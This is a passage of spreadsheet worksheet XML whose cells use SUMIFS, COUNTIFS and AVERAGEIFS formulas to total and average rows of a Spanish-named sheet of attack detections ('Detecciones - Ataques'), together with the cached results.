        <v>0</v>
      </c>
      <c r="AD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>114</v>
      </c>
      <c r="AG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>3</v>
      </c>
      <c r="AH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>1</v>
      </c>
      <c r="AJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>2</v>
      </c>
      <c r="AK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>3</v>
      </c>
      <c r="AL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>8</v>
      </c>
      <c r="AN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>2</v>
      </c>
      <c r="AP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>0</v>
      </c>
      <c r="AQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>2</v>
      </c>
      <c r="AS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>0</v>
      </c>
      <c r="AU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>2</v>
      </c>
      <c r="AV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>1</v>
      </c>
      <c r="AW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>1</v>
      </c>
      <c r="AX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>0</v>
      </c>
      <c r="AY11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>1</v>
      </c>
      <c r="AZ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>3</v>
      </c>
      <c r="BA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>1</v>
      </c>
      <c r="BB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>3</v>
      </c>
      <c r="BC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>3</v>
      </c>
      <c r="BD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>10</v>
      </c>
      <c r="BG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>0</v>
      </c>
      <c r="BI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>1</v>
      </c>
      <c r="BJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>0</v>
      </c>
      <c r="BL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>1</v>
      </c>
      <c r="BM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>2</v>
      </c>
      <c r="BO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>0</v>
      </c>
      <c r="BP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>0</v>
      </c>
      <c r="BR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>1</v>
      </c>
      <c r="BS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>0</v>
      </c>
      <c r="BV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>1</v>
      </c>
      <c r="BW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>0</v>
      </c>
      <c r="BX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>1</v>
      </c>
      <c r="BY11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>0</v>
      </c>
      <c r="BZ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>0</v>
      </c>
      <c r="CA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>5</v>
      </c>
      <c r="CC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>3</v>
      </c>
      <c r="CE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>0</v>
      </c>
      <c r="CF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>0</v>
      </c>
      <c r="CG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>172</v>
      </c>
      <c r="CI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>6</v>
      </c>
      <c r="CJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>0</v>
      </c>
      <c r="CL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>0</v>
      </c>
      <c r="CN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>0</v>
      </c>
      <c r="CO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>2</v>
      </c>
      <c r="CT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>1</v>
      </c>
      <c r="CU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>1</v>
      </c>
      <c r="CV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>0</v>
      </c>
      <c r="CX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>112</v>
      </c>
      <c r="CY11" s="625">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HM$3:$HM$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>3</v>
      </c>
      <c r="CZ11" s="173"/>
      <c r="DA11" s="173"/>
      <c r="DB11" s="173"/>
      <c r="DC11" s="616" t="s">
        <v>951</v>
      </c>
      <c r="DD11" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC11,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>10</v>
      </c>
      <c r="DE11" s="618">
        <v>10.0</v>
      </c>
      <c r="DF11" s="336">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="DG11" s="173">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="DH11" s="337">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="DI11" s="607">
        <f t="shared" si="4"/>
        <v>10</v>
      </c>
      <c r="DJ11" s="608">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="DK11" s="609">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="DL11" s="455">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="DM11" s="610"/>
      <c r="DN11" s="610"/>
      <c r="DO11" s="619" t="s">
        <v>951</v>
      </c>
      <c r="DP11" s="620">
        <f>DD11/'(D) - Análisis Resultados I - S'!EB30</f>
        <v>1.25</v>
      </c>
      <c r="DQ11" s="173"/>
      <c r="DR11" s="619" t="s">
        <v>951</v>
      </c>
      <c r="DS11" s="620">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="DT11" s="173"/>
      <c r="DU11" s="173"/>
      <c r="DV11" s="173"/>
      <c r="DW11" s="173"/>
      <c r="DX11" s="173"/>
      <c r="DY11" s="173"/>
      <c r="DZ11" s="173"/>
      <c r="EC11" s="173"/>
      <c r="ED11" s="173"/>
      <c r="EE11" s="173"/>
      <c r="EF11" s="173"/>
      <c r="EG11" s="173"/>
      <c r="EH11" s="173"/>
      <c r="EI11" s="173"/>
      <c r="EJ11" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ3&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ3*'(B) - Detecciones - Ataques'!HN3/('(B) - Detecciones - Ataques'!HN3+'(B) - Detecciones - Ataques'!HO3),0)</f>
        <v>0</v>
      </c>
      <c r="EK11" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ3&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ3*'(B) - Detecciones - Ataques'!HO3/('(B) - Detecciones - Ataques'!HN3+'(B) - Detecciones - Ataques'!HO3),0)</f>
        <v>0</v>
      </c>
      <c r="EL11" s="173"/>
      <c r="EM11" s="622"/>
      <c r="EN11" s="173"/>
      <c r="EO11" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="EP11" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO11)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO11 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EQ11" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO11)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO11 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="ER11" s="623">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="ES11" s="401"/>
      <c r="ET11" s="402"/>
      <c r="EV11" s="173"/>
      <c r="EW11" s="20" t="s">
        <v>2455</v>
      </c>
      <c r="EX11" s="336">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!HR3:HR139)</f>
        <v>0.5759995794</v>
      </c>
      <c r="FA11" s="173"/>
      <c r="FB11" s="173"/>
      <c r="FC11" s="173"/>
      <c r="FD11" s="173"/>
      <c r="FE11" s="173"/>
      <c r="FF11" s="173"/>
      <c r="FG11" s="173"/>
      <c r="FH11" s="173"/>
      <c r="FI11" s="173"/>
      <c r="FJ11" s="173"/>
      <c r="FK11" s="173"/>
      <c r="FN11" s="173" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("UNIQUE(FILTER('(B) - Detecciones - Ataques'!L3:L139,'(B) - Detecciones - Ataques'!IS3:IS139=""✔"",'(B) - Detecciones - Ataques'!L3:L139&lt;&gt;""-""))"),"TLS")</f>
        <v>TLS</v>
      </c>
      <c r="FO11" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="FP11" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="FQ11" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN11)</f>
        <v>0.3333333333</v>
      </c>
      <c r="FR11" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN11)</f>
        <v>3</v>
      </c>
      <c r="FS11" s="173"/>
      <c r="FT11" s="173"/>
      <c r="FU11" s="173"/>
      <c r="FV11" s="173"/>
      <c r="FW11" s="173"/>
      <c r="FX11" s="173"/>
    </row>
    <row r="12">
      <c r="D12" s="434">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>95772</v>
      </c>
      <c r="E12" s="354">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>92544</v>
      </c>
      <c r="F12" s="350"/>
      <c r="G12" s="350"/>
      <c r="W12" s="173"/>
      <c r="X12" s="173"/>
      <c r="Y12" s="173"/>
      <c r="Z12" s="173"/>
      <c r="AA12" s="173"/>
      <c r="AB12" s="173"/>
      <c r="AC12" s="173"/>
      <c r="AD12" s="173"/>
      <c r="AE12" s="173"/>
      <c r="AF12" s="173"/>
      <c r="AG12" s="173"/>
      <c r="AH12" s="173"/>
      <c r="AI12" s="173"/>
      <c r="AJ12" s="173"/>
      <c r="AK12" s="173"/>
      <c r="AL12" s="173"/>
      <c r="AM12" s="173"/>
      <c r="AN12" s="173"/>
      <c r="AO12" s="173"/>
      <c r="AP12" s="173"/>
      <c r="AQ12" s="173"/>
      <c r="AR12" s="173"/>
      <c r="AS12" s="173"/>
      <c r="AT12" s="173"/>
      <c r="AU12" s="173"/>
      <c r="AV12" s="173"/>
      <c r="AW12" s="173"/>
      <c r="AX12" s="173"/>
      <c r="AY12" s="173"/>
      <c r="AZ12" s="173"/>
      <c r="BA12" s="173"/>
      <c r="BB12" s="173"/>
      <c r="BC12" s="173"/>
      <c r="BD12" s="173"/>
      <c r="BE12" s="173"/>
      <c r="BF12" s="173"/>
      <c r="BG12" s="173"/>
      <c r="BH12" s="173"/>
      <c r="BI12" s="173"/>
      <c r="BJ12" s="173"/>
      <c r="BK12" s="173"/>
      <c r="BL12" s="173"/>
      <c r="BM12" s="173"/>
      <c r="BN12" s="173"/>
      <c r="BO12" s="173"/>
      <c r="BP12" s="173"/>
      <c r="BQ12" s="173"/>
      <c r="BR12" s="173"/>
      <c r="BS12" s="173"/>
      <c r="BT12" s="173"/>
      <c r="BU12" s="173"/>
      <c r="BV12" s="173"/>
      <c r="BW12" s="173"/>
      <c r="BX12" s="173"/>
      <c r="BY12" s="173"/>
      <c r="BZ12" s="173"/>
      <c r="CA12" s="173"/>
      <c r="CB12" s="173"/>
      <c r="CC12" s="173"/>
      <c r="CD12" s="173"/>
      <c r="CE12" s="173"/>
      <c r="CF12" s="173"/>
      <c r="CG12" s="173"/>
      <c r="CH12" s="173"/>
      <c r="CI12" s="173"/>
      <c r="CJ12" s="173"/>
      <c r="CK12" s="173"/>
      <c r="CL12" s="173"/>
      <c r="CM12" s="173"/>
      <c r="CN12" s="173"/>
      <c r="CO12" s="173"/>
      <c r="CP12" s="173"/>
      <c r="CQ12" s="173"/>
      <c r="CR12" s="173"/>
      <c r="CS12" s="173"/>
      <c r="CT12" s="173"/>
      <c r="CU12" s="173"/>
      <c r="CV12" s="173"/>
      <c r="CW12" s="173"/>
      <c r="CX12" s="173"/>
      <c r="CY12" s="173"/>
      <c r="CZ12" s="173"/>
      <c r="DA12" s="173"/>
      <c r="DB12" s="173"/>
      <c r="DC12" s="616" t="s">
        <v>633</v>
      </c>
      <c r="DD12" s="617">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC12,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>4</v>
      </c>
      <c r="DE12" s="618">
        <v>4.0</v>
      </c>
      <c r="DF12" s="336">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="DG12" s="173">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="DH12" s="337">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
